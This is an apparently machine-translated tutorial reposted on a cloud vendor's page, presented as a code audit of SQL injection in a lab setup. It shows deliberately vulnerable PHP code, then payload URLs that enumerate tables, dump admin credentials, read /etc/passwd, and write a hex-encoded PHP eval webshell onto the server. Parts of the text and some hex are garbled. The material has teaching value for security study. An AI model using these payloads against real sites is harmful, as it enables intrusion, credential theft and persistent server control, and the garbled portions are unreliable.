Home > Others

SQL injection of Code audits

Source: Internet
Author: User
Tags sql injection
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Overview, approximate classification

PS: Simple Error injection

0x00 Environment Kali LAMP

0x01 Core Code

The main reason for injection now is that the programmer writes the SQL statement through the most original statement stitching, and the SQL statement has select, Insert, update and delete four types, injection is also the concatenation of the four basic operations produced. Next, I will take select as an example to guide beginners to understand SQL injection. Select is a query operation for a database, so it is common to see and search these places like articles, and the defect codes are as follows:

<?php
$conn=mysql_connect(' localhost ', ' root ', ' root ') or die(' bad! ');
mysql_query("SET NAMES binary");
mysql_select_db(' Test ',$conn) OR emmsg ("Database connection failed");
//here ID does not do shaping conversion
$id=isset($_get[' ID ']) ?$_get[' ID ']: 1;
//SQL statements do not have single-quote protection, resulting in injection
$sql= "SELECT * FROM News WHERE id={$id}";
$result=mysql_query($sql,$conn) or die(Mysql_error());
?>

Database content


0x02 Injection Testing

1. Normal access

http://192.168.192.128/sqltest/news.php

Http://192.168.192.128/sqltest/news.php?id=1 http://192.168.192.128/sqltest/news.php?id=2

...

2. Number of test fields

Ps:3 Normal, 4 error, stating there are three fields

Http://192.168.192.128/sqltest/news.php?id=1 and 1=2 ORDER by 3

Http://192.168.192.128/sqltest/news.php?id=1 and 1=2 ORDER by 4

3. Test echo Field

ps:2,3 all Echo, description is echo field

Http://192.168.192.128/sqltest/news.php?id=-1 Union Select-A-

For example, test the user () function in the 3 field

4. Querying all tables under the current library

192.168.192.128/sqltest/news.php?id=-1 Union SELECT 1,2,GROUP_CONCAT (table_name) from Information_schema.tables where Table_schema=database ()

5. Field names in the test table

Hexadecimal 61646d696e of the ps:admin; News Hex 6e657773

192.168.192.128/sqltest/news.php?id=-1 Union Select 1,2,group_concat (column_name) from Information_schema.columns where table_name=0x61646d696e


6. Query the user name password under the admin table

192.168.192.128/sqltest/news.php?id=-1 Union Select 1,2,group_concat (name,0x23,pass) from admin

7. Read the Linux system files (/etc/passwd, need to convert to 16 binary)

PS: Sufficient permissions

192.168.192.128/sqltest/news.php?id=-1 Union Select 1,2,load_file (0x2f6574632f706173737764)


8. Write the shell if you have sufficient permissions

192.168.192.128/sqltest/news.php?id=-1 Union Select 1,2,0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into OutFile '/var/www/html/1.php '--
If the permissions are insufficient, change the directory
Phpinfo page
192.168.192.128/sqltest/news.php?id=-1 Union select 1,2,0x3c3f70687020706870696e666f28293b203f3e into outfile '/var/ Www/html/sqltest/3.php '--
Write a Webshell (note that the 16 binary conversion is a statement)
192.168.192.128/sqltest/news.php?id=-1 Union Select 1,2,0x3c3f706870206576616c28245f504f53545b615d293b3f3e into OutFile '/var/www/html/sqltest/5.php '--

Execution complete without error


In addition, the files that are injected into the file may not be deleted by root and need to be resolved with chattr. (may be encountered in attack and defense competitions)


Reference:

Http://mp.weixin.qq.com/s?src=3&timestamp=1469346783&ver=1&signature= jfsk7nvvnj9r0jhq1j-kxdp159o764mhq8guzfvppdajpphszefyqhjfvvdwchcjy* Pfagy4pe2kbkvji4-x6khovcmwcubqcpdz7w3fmrbzorgsfoc2zcxeanao2no3trtjokl9h-s-ylq7kqwxvx7ccecejw6rdqawtwcnemi=


SQL injection of Code audits

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
sql injection attack code sql injection source code sql injection code sql injection code list code to prevent sql injection sql injection code for login different types of sql injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More